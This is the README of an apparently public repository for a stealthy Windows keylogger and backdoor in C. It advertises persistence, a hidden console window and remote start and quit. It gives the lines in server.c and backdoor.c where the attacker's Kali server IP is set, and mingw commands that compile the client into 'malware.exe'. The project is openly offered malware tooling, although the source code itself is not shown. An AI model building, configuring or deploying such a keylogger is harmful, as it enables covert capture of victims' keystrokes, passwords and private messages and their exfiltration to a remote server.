README.md

C_keylogger

Stealthy Windows keylogger written in C which uses a traditional approach to logging keystrokes (Does not utilise WinAPI hooks)

Features

• bzero implementation for Windows
• Persistance
• Remotely start keylogger
• Remote 'quit' which performs cleanup
• Reuse of variable via references (lightweight)
• Stealth handler (hides Command Prompt window)

Table of Contents

Ammendments Requires Before Compiling

Change the bind IP address in server.c. As the socket will bind to the specified IP address. Alternatively, use 0.0.0.0 to bind to all interfaces.

C_keylogger/server.c

Line 29 in 7ac1871

server_address.sin_addr.s_addr = inet_addr("192.168.56.102"); //IP addr of Kali Linux

Finally in backdoor.c change the server IP address

C_keylogger/backdoor.c

Line 154 in 7ac1871

ServIP = "192.168.56.102"; //Server IP Addr Kali

Compile Instructions

Compilation takes place in a Linux environement.

(Server/server.c) ~   # sudo apt install mingw-w64 #(required for C compilation)
(Server/server.c) ~   $ gcc server.c -o server
(Server/backdoor.c) ~ $ i686-w64-mingw32-gcc -o malware.exe backdoor.c -lwsock32 -lwininet
                      $ i686-w64-mingw32-gcc -o finalproduct.exe backdoor.c -lwsock32 -lwininet

NOTE: backdoor.c is compiled as Win32/x86/i686 to ensure it runs on both x86 and x64 architectures. Win32 applications will run on 64-bit Windows due to WoW64.

Wrapping, encoding or encrpytion for AV evasion are NOT included!

Preview Images

Demonstration of Privileges

Unwrapped Compiled Malware